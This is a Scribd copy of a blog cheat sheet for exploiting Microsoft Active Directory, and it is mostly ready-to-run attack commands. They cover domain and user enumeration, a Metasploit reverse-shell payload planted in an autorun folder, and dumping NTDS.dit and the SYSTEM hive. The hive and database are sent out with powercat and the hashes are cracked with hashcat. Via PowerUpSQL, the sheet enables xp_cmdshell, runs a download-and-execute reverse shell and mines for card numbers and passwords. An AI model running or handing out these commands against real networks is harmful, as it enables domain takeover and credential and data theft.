Scribd
Upload
1K views14 pages

Active Directory Exploitation Cheat Sheet: Share

The document provides an Active Directory exploitation cheat sheet with common enumeration and attack methods organized into phases: 1. Reconnaissance including port scanning and Active Directory module commands without RSAT. 2. Domain enumeration covering domains, users, computers, groups and shares. 3. Local privilege escalation detection and exploitation examples. 4. User hunting to find administrative access and logged in users. 5. Account hunting, data exfiltration and obtaining the NTDS.dit file containing hashed passwords.

Uploaded by

Sokoine Hamad Denis
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
1K views14 pages

Active Directory Exploitation Cheat Sheet: Share

The document provides an Active Directory exploitation cheat sheet with common enumeration and attack methods organized into phases: 1. Reconnaissance including port scanning and Active Directory module commands without RSAT. 2. Domain enumeration covering domains, users, computers, groups and shares. 3. Local privilege escalation detection and exploitation examples. 4. User hunting to find administrative access and logged in users. 5. Account hunting, data exfiltration and obtaining the NTDS.dit file containing hashed passwords.

Uploaded by

Sokoine Hamad Denis
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd

Menu

View cart

 HOME
 COURSES


 MEMBERSHIP
 HOW TO ENROLL
 ABOUT US
 FAQs
 BLOGS
 JOBS
 COURSE LOGIN
 APPS

Share:

Share on Facebook Tweet on Twitter Share on Google+


Pin on Pinterest
May 16, 2021 Ethical Hackers Academy

Active Directory Exploitation Cheat Sheet


Active Directory is a Microsoft service run in the Server that predominantly used to manage
various permission and resources around the network, also it performs an
authenticates and authorizes all users and computers in a Windows domain type networks.

Recent cyber-attacks are frequently targeting the vulnerable active directory services used in
enterprise networks where the organization handling the 1000's of computers in the single point
of control called "Domain controller" which is one of the main targeted services by the APT
Hackers.

Though exploiting Active directory is a challenging task, It is certain to activate directory


exploitation Cheat Sheet which contains common enumeration and attack methods which
including the several following phases to make it simple.

 Recon
 Domain Enum
 Local Privilege Escalation
 User Hunting
 Domain Admin Privileges
 Database Hunting
 Data Exfiltration
 Active Directory Exploitation Tools

Member Packages for 100 + Online Cyber


Security Courses: Access Entire Website
Cyber Security Courses List 

   

Reconnaissance
Recon Phase contains various modules, including Port scan that performs the following
operations.

PORT SCAN

Import-Module Invoke-Portscan.ps1
<#
Invoke-Portscan -Hosts
"[Link],[Link],[Link]" -TopPorts 50 echo
[Link] | Invoke-Portscan -oG [Link] -f -ports "80,443,8080"
Invoke-Portscan -Hosts [Link]/24 -T 4 -TopPorts 25 -oA localnet
#>

AD MODULE WITHOUT RSAT

The secret to being able to run AD enumeration commands from the AD Powershell module on a
system without RSAT installed, is the DLL located
in C:\Windows\[Link]\assembly\GAC_64\[Link] 
on a system that has the RSAT installed.

Set up your AD VM, install RSAT, extract the dll and drop it to the target system used to
enumerate the active directory.

Import-Module .\[Link]
Get-Command get-adcom*

Domain Enumeration
DOMAIN

 Get current domain

Get-NetDomain (PowerView)
Get-ADDomain (ActiveDirectory Module)

 Get object of another domain

Get-NetDomain -Domain [Link]


Get-ADDomain -Identity [Link]

 Get domain SID for the current domain

Get-DomainSID
(Get-ADDomain).DomainSID

 Get domain policy for the current domain

Get-DomainPolicy
(Get-DomainPolicy)."system access"

 Get domain policy for another domain

(Get-DomainPolicy -domain [Link])."system access"

 Get domain controllers for the current domain

Get-NetDomainController
Get-ADDomainController

 Get domain controllers for another domain

Get-NetDomainController -Domain [Link]


Get-ADDomainController -DomainName [Link] -Discover

NETUSER

 Get a list of users in the current domain

Get-NetUser
Get-NetUser -Username student1
Get-NetUser | select -ExpandProperty samaccountname
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity student1 -Properties *

 Get list of all properties for users in the current domain

Get-UserProperty
Get-UserProperty -Properties pwdlastset
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType
*Property | select Name
Get-ADUser -Filter * -Properties * | select
name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}

 Search for a particular string in a user's attributes

Find-UserField -SearchField Description -SearchTerm "built"


Get-ADUser -Filter 'Description -like "*built*"' -Properties Description |
select name,Description

NETGROUP

 Get a list of computers in the current domain

Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData
Get-ADComputer -Filter * | select Name Get-ADComputer -Filter 'OperatingSystem
-like "*Server 2016*"' -Properties OperatingSystem | select
Name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1
-ComputerName $_.DNSHostName}
Get-ADComputer -Filter * -Properties *

 Get all the groups in the current domain

Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-ADGroup -Filter * | select Name
Get-ADGroup -Filter * -Properties *

 Get all groups containing the word "admin" in group name

Get-NetGroup *admin*
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name

 Get all the members of the Domain Admins group

Get-NetGroupMember -GroupName "Domain Admins" -Recurse


Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain [Link]

 Get the group membership for a user

Get-NetGroup -UserName "john"


Get-ADPrincipalGroupMembership -Identity student1

 List all the local groups on a machine (needs administrator privs on non-dc
machines)

Get-NetLocalGroup -ComputerName [Link] -ListGroups

 Get members of all the local groups on a machine (needs administrator privs on non-dc
machines)

Get-NetLocalGroup -ComputerName [Link] -Recurse

LOGGED

 Get actively logged users on a computer (needs local admin rights on the target)

Get-NetLoggedon -ComputerName <servername>

 Get locally logged users on a computer (needs remote registry on the target - started
by-default on server OS)

Get-LoggedonLocal -ComputerName [Link]

 Get the last logged user on a computer (needs administrative rights and remote
registry on the target)

Get-LastLoggedOn -ComputerName <servername>

SHARE

 Find shares on hosts in current domain

Invoke-ShareFinder -Verbose
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose

 Find sensitive files on computers in the domain

Invoke-FileFinder -Verbose

 Get all fileservers of the domain


Get-NetFileServer

Local Privilege Escalation


Detection

Windows VM

1. Open command prompt and type:


C:\Users\User\Desktop\Tools\Autoruns\[Link]
2. In Autoruns, click on the ‘Logon’ tab.
3. From the listed results, notice that the “My Program” entry is pointing to “C:\Program
Files\Autorun Program\[Link]”.
4. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\[Link]
-wvu "C:\Program Files\Autorun Program"
5. From the output, notice that the “Everyone” user group has “FILE_ALL_ACCESS”
permission on the “[Link]” file.

Exploitation

Kali VM

1. Open command prompt and type: msfconsole


2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p
windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o [Link]
7. Copy the generated file, [Link], to the Windows VM.

Windows VM

1. Place [Link] in ‘C:\Program Files\Autorun Program’.


2. To simulate the privilege escalation effect, logoff and then log back on as an
administrator user.

Kali VM

1. Wait for a new session to open in Metasploit.


2. In Metasploit (msf > prompt) type: sessions -i [Session ID]
3. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

Memory

Exploitation
Kali VM

1. Open command prompt and type: msfconsole


2. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
3. In Metasploit (msf > prompt) type: set uripath x
4. In Metasploit (msf > prompt) type: run

Windows VM

1. Open Internet Explorer and browse to: [Link] VM IP Address]/x


2. Open command prompt and type: taskmgr
3. In Windows Task Manager, right-click on the “[Link]” in the "Image Name"
columnand select “Create Dump File” from the popup menu.
4. Copy the generated file, [Link], to the Kali VM.

Kali VM

1. Place '[Link]' on the desktop.


2. Open command prompt and type: strings /root/Desktop/[Link] | grep
"Authorization: Basic"
3. Select the Copy the Base64 encoded string.
4. In command prompt type: echo -ne [Base64 String] | base64 -d
5. Notice the credentials in the output.

4. USER HUNTING
 Find all machines on the current domain where the current user has local admin access
(Get-NetComputer + Invoke-CheckLocalAdminAccess)

Find-LocalAdminAccess -Verbose

 Find Administrative access

. .\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
# No Stateful
Enter-PSSession -ComputerName [Link]
# Stateful
$sess = New-Pssession -ComputerName [Link]
Enter-Pssession -session $sess

 If RPC and SMB are blocked check with WMI

. .\Find-WMILocalAdminAccess.ps1

 Find local admins on all machines of the domain (Get-NetComputer+Get-


NetLocalGroup)
Invoke-EnumerateLocalAdmin -Verbose

 Find computers where a domain admin (or specified user/group) has sessions

Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"

 Confirm admin access

Invoke-UserHunter -CheckAccess

 Find computers where a domain admin is logged-in ( Get-NetSession / Get-NetLoggedon


)

Invoke-UserHunter -Stealth

 WAIT FOR INCOMING SESSINON

Invoke-UserHunter -ComputerName targetserver -Poll 100 -UserName Administrator


-Delay 5 -Verbose

5. Account Hunting & Data Exfiltration


Obtaining [Link] Using ntdsutil
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit

Obtaining [Link] Using vssadmin


mkdir c:\extract
REM -> c:\Windows\system32
vssadmin create shadow /for=c:
copy \\?GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\ntds\[Link]
c:\extract\[Link]
reg SAVE HKLM\SYSTEM c:\extract\SYS
REM yes
REM exfiltrate to your attacker computer
REM housekeeping
vssadmin delete shadows /shadow={PATH} /Quiet

Obtaining [Link] Using shadow copy (SeBackup)


# Create [Link] file that will contain the shadow copy process script
#Script ->{
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\[Link]
set verbose on
begin backup
add volume c: alias mydrive

create

expose %mydrive% w:
end backup
#}

# TRANSFERT TO TARGET SYSTEM


Invoke-WebRequest -Uri "[Link] -OutFile
"C:\\windows\\system32\\spool\\drivers\\color\\[Link]"

# EXEC DISKSHADOW
cd C:\windows\system32\spool\drivers\color
[Link] -s [Link]

# CHECK THE CAB


ls
-a---- 6/7/2020 9:31 PM 743 [Link]

# IMPORTING DLL SeBackupPrivilegeCmdLets & SeBackupPrivilegeUtils


Invoke-WebRequest -Uri "[Link]
-OutFile
"C:\\windows\\system32\\spool\\drivers\\color\\[Link]"
Invoke-WebRequest -Uri "[Link]
-OutFile
"C:\\windows\\system32\\spool\\drivers\\color\\[Link]"
Import-Module .\[Link]
Import-Module .\[Link]

# CHECK MODULE
get-help SeBackupPrivilege
Name Category Module Synopsis
---- -------- ------ --------
Get-SeBackupPrivilege Cmdlet SeBackupPrivilegeCmdLets ...
Set-SeBackupPrivilege Cmdlet SeBackupPrivilegeCmdLets ...
Copy-FileSeBackupPrivilege Cmdlet SeBackupPrivilegeCmdLets ...

#Use the functionality of the dlls to copy the [Link] database file from the
shadow copy to a location of our choice
Copy-FileSeBackupPrivilege w:\windows\NTDS\[Link] c:\Windows\temp\[Link]
-Overwrite

# Dump ACTUAL SYSTEM hive


[Link] save HKLM\SYSTEM c:\temp\[Link]

# FILE TRANSFERT
powercat -c [Link] -p 443 -i c:\Windows\temp\[Link]
powercat -c [Link] -p 443 -i c:\Windows\temp\[Link]

Rebuild AD Hashes
 -ntds: location and name of the [Link] file
 -system: location and name of the SYSTEM hive
 -hashes lmnhash:nthash: NTLM hash
 LOCAL: parse files on the local system
 -outputfile: location and name of the output file. Extensions are automatically added
based on content extracted

# impacket
[Link] -ntds [Link] -system SYS -hashes lmhash:nthash LOCAL
-outputfile ntlm-extract

Install your NVIDIA Driver for GPU Power


apt install -y nvidia-driver nvidia-cuda-toolkit
apt install -y mesa-utils
# CHECK
nvidia-smi
# CHECK
nvidia-smi -i 0 -q
# CHECK
glxinfo | grep -i "direct rendering"

Cracking

 -m 1000: NTLM | Operating Systems


 [Link]: secretsdump outfile
 /usr/share/wordlists/[Link]: plaintext wordlist
 -o: location of cracked hash

hashcat -m 1000 [Link] /usr/share/wordlists/[Link] -o cracked


cat cracked

Database Hunting - MSSQL


Tool : PowerUpSQL

Import-Module .\PowerupSQL.psd1

Discovery (SPN Scanning)

Get-SQLInstanceDomain

Discover Local SQL Server Instances

Get-SQLInstanceLocal -Verbose
Discover Remote SQL Server Instances

Get-SQLInstanceBroadcast -Verbose
Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1
Get-SQLInstanceFile -FilePath c:\temp\[Link] | Get-
SQLInstanceScanUDPThreaded -Verbose

Discover Active Directory Domain SQL Server Instances using alternative domain
credentials

runas /noprofile /netonly /user:domain\user [Link]


import-module PowerUpSQL.psd1
Get-SQLInstanceDomain -Verbose -DomainController [Link] -Username
domain\user -password 'P@ssword123'

Check Accessibility

Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Gather Information

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Look for links to remote servers

Get-SQLServerLink -Instance db-mssql -Verbose

Enumerating Database Links

Get-SQLServerLinkCrawl -Instance db-mssql -Verbose

List SQL Servers using a specific domain account

Get-SQLInstanceDomain -Verbose -DomainAccount SQLSvc

List shared domain user SQL Server service accounts

Get-SQLInstanceDomain -Verbose | Group-Object DomainAccount | Sort-Object


count -Descending | select Count,Name | Where-Object {($_.name -notlike "*$")
-and ($_.count -gt 1) }

Authenticating to a known SQL Server instance as the current domain user.

Get-SQLQuery -Verbose -Instance "[Link],1433"

Authenticating to a known SQL Server instance using a SQL Server login.

# Server and Instance Name


Get-SQLQuery -Verbose -Instance "servername\instancename" -username testuser
-password testpass
# IP and Instance Name
Get-SQLQuery -Verbose -Instance "[Link]\instancename" -username testuser
-password testpass
# IP and Port
Get-SQLQuery -Verbose -Instance "[Link],1433" -username testuser -password
testpass

Get general server information such as SQL/OS versions, service accounts, sysdmin access
etc.

Get-SQLServerInfo -Verbose -Instance SQLServer1\Instance1


#
$ServerInfo = Get-SQLInstanceDomain | Get-SQLServerInfoThreaded -Verbose
-Threads 10
$ServerInfo

Get an inventory of common objects from the remote server including permissions,
databases, tables, views etc, and dump them out into CSV files.

Invoke-SQLDumpInfo -Verbose -Instance Server1\Instance1

Audit for Issues

Invoke-SQLAudit -Verbose -Instance SQLServer1

Execute OS commands: Agent Job - PowerShell

$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command


'write-output "hello world" | out-file c:\windows\temp\[Link]' -Sleep 20

Xp_cmdshell v1

Get-SQLServerLinkCrawl -Instance db-mssql -Query "sp_configure 'show advanced


options', '1'"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "RECONFIGURE"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "sp_configure 'xp_cmdshell',
'1'"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "RECONFIGURE"

Xp_cmdshell v2

Get-SQLQuery -Query 'EXECUTE(''sp_configure


''''xp_cmdshell'''',1;reconfigure;'') AT "[Link]"'

Xp_cmdshell v3

Get-SQLServerLinkCrawl -Instance DOMAIN\SQLEXPRESS 'EXECUTE(''sp_configure


''''xp_cmdshell'''',1;reconfigure;'') AT "[Link]"'
OSQL Xp_cmdshell

osql -E -S "db-mssql" -Q "EXECUTE('sp_configure


''xp_cmdshell'',1;RECONFIGURE;') AT [[Link]]"

Executing Commands

Get-SQLServerLinkCrawl -Instance db-mssql -Query "exec master..xp_cmdshell


"whoami'"

Reverse shell

Get-SQLServerLinkCrawl -Instance db-mssql -Query 'exec master..xp_cmdshell


"powershell iex (New-Object
[Link]).DownloadString(''[Link]

Data mining

Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-


SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword
"credit,ssn,password" -SampleSize 2 -ValidateCC -NoDefaults

Check files

Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLDatabaseThreaded


-Verbose -Threads 10 -NoDefaults | Where-Object {$_.is_encrypted -eq "TRUE"} |
Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "card, password"
-SampleSize 2 -ValidateCC -NoDefaults

Extracting SQL Server Login password hashes

Get-SQLServerPasswordHash -Verbose -Instance MSSQLSERVER2016\db-mssql -Migrate

Active Directory Exploitation Tools


ADACLScanner

ASREPRoast

Adduser-c

AmsiScanBufferBypass

BeRoot

DAMP-master

Deploy-Deception-master
Find-PS-WMI

GhostPack

HFS

HeidiSQL

Invoke-Obfuscation

Invoke-SDPropagator

Kekeo

Mimikatz

NetCease

PowerSploit-Dev

PowerSploit-Master

PowerUpSQL

Powercat

Powerless

Powermad

Privesc-master

PsTools

Python-pty-shells

RSAT

SessionGopher

Set-DCShadow

SharpHound

You might also like